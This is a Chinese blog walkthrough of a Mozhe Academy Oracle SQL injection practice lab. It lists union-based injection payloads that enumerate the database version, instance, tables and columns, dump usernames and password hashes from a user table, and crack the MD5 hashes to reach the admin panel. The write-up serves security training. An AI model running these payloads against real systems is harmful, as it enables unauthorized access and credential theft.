首页 > 数据库 >墨者学院Oracle靶场通关

墨者学院Oracle靶场通关

时间:2024-08-20 20:52:19浏览次数:13  
标签:union rownum USER Oracle 靶场 null id select 墨者

首先1判断注入点

这⾥通过and 1=1 和and 1=2进⾏判断。

发现存在注入点之后我们开始判断字段数

id=1 order by 2

id=1 order by 3 字段=3页面回显异常 ,说明只存在两个字段

接下来我们开始判断回显点

id=-1 union select 'null','null' from dual

查完之后我们开始用下面的语句查看数据库版本信息

id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual

查询数据库名

id=-1 union select 'null',(select instance_name from V$INSTANCE) from dual

查询数据库表名,查询表名⼀般查询admin或者user表

id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual

id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual

查询字段名信息

id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1) from dual

查询用户名和密码信息

id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'

id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME <> 'hu'

得到密码之后我们用md5进行解密之后就可以登录后台了

标签:union,rownum,USER,Oracle,靶场,null,id,select,墨者
From: https://blog.csdn.net/Nai_zui_jiang/article/details/141354739

相关文章

  • oracle & mysql 驱动程序安装配置
    Install-PackageOracle.ManagedDataAccess-Version12.2.20230118  版本可以安装到19.18Install-PackageMySql.Data-Version8.0.32.1config文件新增内容<system.data>  <DbProviderFactories>    <removeinvariant="MySql.Data.MySqlClient"/>    &......
  • 【Oracle】存储过程临时存储键值对
    【Oracle】存储过程临时存储键值对通常可以使用pl/sql表(也称为索引表或关联数组)来存储这些键值对,即typekey_value_tableistableofvarchar2(100)indexbyvarchar2(100)示例:createorreplaceprocedurestore_key_value_pairsis--定义一个pl/sql表来存储键值对......
  • 修改Oracle字符集为ZHS16GBK
    修改Oracle字符集为ZHS16GBK1、登录DBA用户 #登录dba用户sqlplus/nologSQL>connectsys/oracleassysdba2、查看当前字符集 #查看当前字符集SELECT*FROMV$NLS_PARAMETERSWHEREPARAMETER='NLS_CHARACTERSET';SELECTUSERENV('language')FROMDUAL;3、......
  • 综合靶场通关记录
    目录Authentication0x01通关记录暴力破解:Authentication0x02通关记录Authentication0x03通关记录IDOR通关记录文件包含0x01        文件包含漏洞:文件包含0x02文件包含0x03[挑战]Sql注入0x01Sql注入0x03注入0x04XSS0x01XSS0x02XSS0x03命令......
  • Oracle RAC 集群启动顺序 转发:https://www.modb.pro/db/1824295923545612288?utm_s
    前言前几天使用脚本在RockyLinux9.4安装Oracle11GR2RAC,安装完之后发现集群无法正常启动,后经过分析发现原来是因为RHEL9版本默认安装移除了 initscripts 软件包,需要人为手动安装,在RHEL8之前是默认安装的。在分析问题的过程中,顺便对OracleRAC集群启动顺序进行了更......
  • 如何在Oracle中使用同义词优化数据库访问
    1.同义词的概念:同义词是为数据库对象定义的别名,目的是简化SQL语句的书写。通过使用同义词,用户可以用一个简短且易记的名称来替代一个复杂的数据库对象名称,从而使得SQL语句更简洁。2.同义词的类型:私有同义词:由普通用户创建,通常只能由创建该同义词的用户使用。公共同义......
  • Oracle运算符:从等号到空值运算的使用技巧
    在Oracle数据库中,关系运算符和逻辑运算符用于在SQL查询中定义条件。1.等号(=)运算符作用:用于精确匹配字段的值。适用场景:适用于比较数值、字符串、日期等数据类型,要求条件严格相等。例子:SELECTename,salFROMempWHEREdeptno=10;查询部门编号为10的所有员工姓名和......
  • Oracle数据库必学!超实用的9个字符串处理函数
    Oracle查询语句中的单行函数,特别是一些常用的字符串处理函数。1.ConCAT函数作用:将两个字符串连接在一起,生成一个新的字符串。使用方法:concat(字符串1,字符串2)示例:SELECTconcat('Hello,','World')FROMDUAL;结果为:“Hello,World”。2.CHR与ASCII函数CHR函数......
  • Oracle索引使用原则:优化查询性能的关键
    1.索引信息的查询:要获取数据库中索引的相关信息,如索引类型、所在表、是否唯一索引等,可以查询与索引相关的数据字典视图。常用的数据字典视图包括dba_indexes、dba_ind_columns、user_indexes和user_ind_columns等。dba_indexes和dba_ind_columns视图需要DBA权限才能访问,......
  • oracle数据库缓存区高速缓存区
    文章目录Oracle数据库高速缓存一、数据库高速缓存的基本概念二、数据库高速缓存的工作原理三、数据库高速缓存的配置四、数据库高速缓存的块管理五、多种数据块大小的高速缓存配置Oracle数据库高速缓存一、数据库高速缓存的基本概念1、数据库高速缓存(DatabaseB......